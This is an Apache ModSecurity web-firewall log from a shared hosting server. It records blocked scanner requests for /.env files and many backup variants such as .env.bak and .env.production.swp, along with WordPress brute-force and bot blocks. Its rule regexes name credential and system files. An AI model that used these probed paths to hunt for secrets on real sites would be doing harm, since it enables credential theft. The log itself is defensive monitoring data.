[Tue May 26 13:07:00.485110 2026] [security2:error] [pid 485064:tid 485312] [client 176.65.139.233:20204] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "agsnails.com.thedebateafrica.org"] [uri "/.env"] [unique_id "ahVNnD9tlF55stOmSqEYOAAAAPs"]
[Tue May 26 13:07:00.508495 2026] [security2:error] [pid 485064:tid 485277] [client 20.104.227.76:4097] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "sreeyogapackersmovers.com.svijaykumar.in"] [uri "/rip.php"] [unique_id "ahVNnD9tlF55stOmSqEYPAAAANg"]
[Tue May 26 13:07:00.650520 2026] [security2:error] [pid 485064:tid 485249] [client 176.65.139.233:37508] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "jetstarprojects.com"] [uri "/.env"] [unique_id "ahVNnD9tlF55stOmSqEYQQAAALw"]
[Tue May 26 13:07:01.399310 2026] [security2:error] [pid 485064:tid 485304] [client 142.248.80.191:42670] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.nationspioneer.taotechservices.com"] [uri "/.env"] [unique_id "ahVNnT9tlF55stOmSqEYZAAAAPM"]
[Tue May 26 13:07:01.431441 2026] [security2:error] [pid 485064:tid 485229] [client 142.248.80.191:42704] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.nationspioneer.taotechservices.com"] [uri "/api/.env"] [unique_id "ahVNnT9tlF55stOmSqEYcQAAAKg"]
[Tue May 26 13:07:01.431562 2026] [security2:error] [pid 485064:tid 485204] [client 142.248.80.191:42720] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.nationspioneer.taotechservices.com"] [uri "/backend/.env"] [unique_id "ahVNnT9tlF55stOmSqEYcAAAAI8"]
[Tue May 26 13:07:01.431910 2026] [security2:error] [pid 485064:tid 485321] [client 142.248.80.191:42702] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.nationspioneer.taotechservices.com"] [uri "/app/.env"] [unique_id "ahVNnT9tlF55stOmSqEYdQAAAQQ"]
[Tue May 26 13:07:02.245664 2026] [security2:error] [pid 485064:tid 485231] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNnT9tlF55stOmSqEYjQAAAKo"]
[Tue May 26 13:07:02.477012 2026] [security2:error] [pid 485064:tid 485222] [client 85.208.96.203:45594] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/9/"] [unique_id "ahVNnj9tlF55stOmSqEYqAAAAKE"]
[Tue May 26 13:07:02.477170 2026] [security2:error] [pid 485064:tid 485222] [client 85.208.96.203:45594] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/9/"] [unique_id "ahVNnj9tlF55stOmSqEYqAAAAKE"]
[Tue May 26 13:07:02.921111 2026] [security2:error] [pid 485064:tid 485131] [remote 185.227.134.44:40278] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 44.134.227.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kurgu-afrika.com"] [uri "/wp-login.php"] [unique_id "ahVNnj9tlF55stOmSqEYsQAAkUI"]
[Tue May 26 13:07:03.745249 2026] [security2:error] [pid 485064:tid 485228] [client 114.119.137.45:23893] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/2/"] [unique_id "ahVNnz9tlF55stOmSqEY2QAAAKc"], referer: https://theafterglow-centre.com/events/list/?tribe-bar-date=2024-02-18&eventDisplay=past
[Tue May 26 13:07:04.168508 2026] [security2:error] [pid 485064:tid 485229] [client 20.104.227.76:8309] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "sreeyogapackersmovers.com.svijaykumar.in"] [uri "/admin.php"] [unique_id "ahVNoD9tlF55stOmSqEY5wAAAKg"]
[Tue May 26 13:07:04.717900 2026] [security2:error] [pid 485064:tid 485244] [client 173.239.240.43:56625] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 43.240.239.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ntgpnk.in"] [uri "/wp-login.php"] [unique_id "ahVNoD9tlF55stOmSqEY-gAAALc"]
[Tue May 26 13:07:04.725083 2026] [security2:error] [pid 485064:tid 485214] [client 173.239.240.35:33997] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 35.240.239.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ntgpnk.in"] [uri "/wp-login.php"] [unique_id "ahVNoD9tlF55stOmSqEY_AAAAJk"]
[Tue May 26 13:07:04.727479 2026] [security2:error] [pid 485064:tid 485266] [client 173.239.240.38:21181] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 38.240.239.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ntgpnk.in"] [uri "/wp-login.php"] [unique_id "ahVNoD9tlF55stOmSqEY-wAAAM0"]
[Tue May 26 13:07:04.925769 2026] [security2:error] [pid 485064:tid 485249] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNoD9tlF55stOmSqEY-QAAALw"]
[Tue May 26 13:07:05.158169 2026] [security2:error] [pid 485064:tid 485282] [client 103.131.71.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahVNnz9tlF55stOmSqEYzAAAAN0"]
[Tue May 26 13:07:05.180978 2026] [security2:error] [pid 485064:tid 485194] [client 142.248.80.191:42724] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "www.nationspioneer.taotechservices.com"] [uri "/.env.production.copy"] [unique_id "ahVNoT9tlF55stOmSqEZEAAAAIU"]
[Tue May 26 13:07:05.659351 2026] [security2:error] [pid 485064:tid 485278] [client 142.248.80.191:44462] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "www.nationspioneer.taotechservices.com"] [uri "/.env.swp"] [unique_id "ahVNoT9tlF55stOmSqEZJAAAANk"]
[Tue May 26 13:07:05.659474 2026] [security2:error] [pid 485064:tid 485264] [client 142.248.80.191:44474] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "www.nationspioneer.taotechservices.com"] [uri "/.env.copy"] [unique_id "ahVNoT9tlF55stOmSqEZIgAAAMs"]
[Tue May 26 13:07:05.659908 2026] [security2:error] [pid 485064:tid 485229] [client 142.248.80.191:44468] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "www.nationspioneer.taotechservices.com"] [uri "/.env.orig"] [unique_id "ahVNoT9tlF55stOmSqEZIwAAAKg"]
[Tue May 26 13:07:05.661818 2026] [security2:error] [pid 485064:tid 485251] [client 142.248.80.191:44458] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "www.nationspioneer.taotechservices.com"] [uri "/.env~"] [unique_id "ahVNoT9tlF55stOmSqEZJQAAAL4"]
[Tue May 26 13:07:05.662301 2026] [security2:error] [pid 485064:tid 485196] [client 142.248.80.191:44452] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.nationspioneer.taotechservices.com"] [uri "/.env.backup"] [unique_id "ahVNoT9tlF55stOmSqEZKQAAAIc"]
[Tue May 26 13:07:05.662641 2026] [security2:error] [pid 485064:tid 485311] [client 142.248.80.191:44444] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.nationspioneer.taotechservices.com"] [uri "/.env.bak"] [unique_id "ahVNoT9tlF55stOmSqEZKgAAAPo"]
[Tue May 26 13:07:05.662925 2026] [security2:error] [pid 485064:tid 485261] [client 142.248.80.191:44446] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "www.nationspioneer.taotechservices.com"] [uri "/.env.old"] [unique_id "ahVNoT9tlF55stOmSqEZKwAAAMg"]
[Tue May 26 13:07:05.664046 2026] [security2:error] [pid 485064:tid 485206] [client 142.248.80.191:44418] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.nationspioneer.taotechservices.com"] [uri "/.env.local.bak"] [unique_id "ahVNoT9tlF55stOmSqEZKAAAAJE"]
[Tue May 26 13:07:05.698923 2026] [security2:error] [pid 485064:tid 485219] [client 142.248.80.191:44576] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.nationspioneer.taotechservices.com"] [uri "/.env.production.backup"] [unique_id "ahVNoT9tlF55stOmSqEZMgAAAJ4"]
[Tue May 26 13:07:05.698951 2026] [security2:error] [pid 485064:tid 485292] [client 142.248.80.191:44598] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "www.nationspioneer.taotechservices.com"] [uri "/.env.production~"] [unique_id "ahVNoT9tlF55stOmSqEZMQAAAOc"]
[Tue May 26 13:07:05.699712 2026] [security2:error] [pid 485064:tid 485309] [client 142.248.80.191:44610] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "www.nationspioneer.taotechservices.com"] [uri "/.env.production.swp"] [unique_id "ahVNoT9tlF55stOmSqEZMwAAAPg"]
[Tue May 26 13:07:05.700001 2026] [security2:error] [pid 485064:tid 485294] [client 142.248.80.191:44626] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "www.nationspioneer.taotechservices.com"] [uri "/.env.production.orig"] [unique_id "ahVNoT9tlF55stOmSqEZNQAAAOk"]
[Tue May 26 13:07:05.700824 2026] [security2:error] [pid 485064:tid 485262] [client 142.248.80.191:44570] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "www.nationspioneer.taotechservices.com"] [uri "/.env.production.old"] [unique_id "ahVNoT9tlF55stOmSqEZNgAAAMk"]
[Tue May 26 13:07:05.702083 2026] [security2:error] [pid 485064:tid 485274] [client 142.248.80.191:44556] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "www.nationspioneer.taotechservices.com"] [uri "/.env.local.copy"] [unique_id "ahVNoT9tlF55stOmSqEZNwAAANU"]
[Tue May 26 13:07:05.702319 2026] [security2:error] [pid 485064:tid 485319] [client 142.248.80.191:44554] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "www.nationspioneer.taotechservices.com"] [uri "/.env.local.orig"] [unique_id "ahVNoT9tlF55stOmSqEZOAAAAQI"]
[Tue May 26 13:07:05.704499 2026] [security2:error] [pid 485064:tid 485303] [client 142.248.80.191:44538] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "www.nationspioneer.taotechservices.com"] [uri "/.env.local.swp"] [unique_id "ahVNoT9tlF55stOmSqEZPAAAAPI"]
[Tue May 26 13:07:05.704611 2026] [security2:error] [pid 485064:tid 485295] [client 142.248.80.191:44522] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "www.nationspioneer.taotechservices.com"] [uri "/.env.local~"] [unique_id "ahVNoT9tlF55stOmSqEZPQAAAOo"]
[Tue May 26 13:07:05.704870 2026] [security2:error] [pid 485064:tid 485247] [client 142.248.80.191:44494] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "www.nationspioneer.taotechservices.com"] [uri "/.env.local.old"] [unique_id "ahVNoT9tlF55stOmSqEZPgAAALo"]
[Tue May 26 13:07:05.705328 2026] [security2:error] [pid 485064:tid 485217] [client 142.248.80.191:44560] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.nationspioneer.taotechservices.com"] [uri "/.env.production.bak"] [unique_id "ahVNoT9tlF55stOmSqEZOQAAAJw"]
[Tue May 26 13:07:05.705511 2026] [security2:error] [pid 485064:tid 485230] [client 142.248.80.191:44498] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.nationspioneer.taotechservices.com"] [uri "/.env.local.backup"] [unique_id "ahVNoT9tlF55stOmSqEZQAAAAKk"]
[Tue May 26 13:07:06.020987 2026] [security2:error] [pid 485064:tid 485244] [client 40.77.167.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "theafterglow-centre.com"] [uri "/index.php"] [unique_id "ahVNoT9tlF55stOmSqEZQwAAALc"]
[Tue May 26 13:07:06.748872 2026] [security2:error] [pid 485064:tid 485312] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNoj9tlF55stOmSqEZXgAAAPs"]
[Tue May 26 13:07:08.613310 2026] [security2:error] [pid 485064:tid 485286] [client 176.65.139.236:52554] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "rakeshdewan.com"] [uri "/.env"] [unique_id "ahVNpD9tlF55stOmSqEZsQAAAOE"]
[Tue May 26 13:07:08.730700 2026] [security2:error] [pid 485064:tid 485262] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNpD9tlF55stOmSqEZoQAAAMk"]
[Tue May 26 13:07:08.765232 2026] [security2:error] [pid 485064:tid 485197] [client 176.65.139.231:63124] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.rakeshdewan.moes-art.com"] [uri "/.env"] [unique_id "ahVNpD9tlF55stOmSqEZuAAAAIg"]
[Tue May 26 13:07:09.769748 2026] [security2:error] [pid 485064:tid 485316] [client 176.65.139.232:61716] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "stvica.com"] [uri "/.env"] [unique_id "ahVNpT9tlF55stOmSqEZ6gAAAP8"]
[Tue May 26 13:07:09.770409 2026] [security2:error] [pid 485064:tid 485270] [client 176.65.139.232:61732] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "koneksi.com.co"] [uri "/.env"] [unique_id "ahVNpT9tlF55stOmSqEZ6wAAANE"]
[Tue May 26 13:07:09.775729 2026] [security2:error] [pid 485064:tid 485218] [client 176.65.139.236:52570] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "consola.co"] [uri "/.env"] [unique_id "ahVNpT9tlF55stOmSqEZ7AAAAJ0"]
[Tue May 26 13:07:09.779414 2026] [security2:error] [pid 485064:tid 485282] [client 176.65.139.237:49276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "jhonparra.com"] [uri "/.env"] [unique_id "ahVNpT9tlF55stOmSqEZ7QAAAN0"]
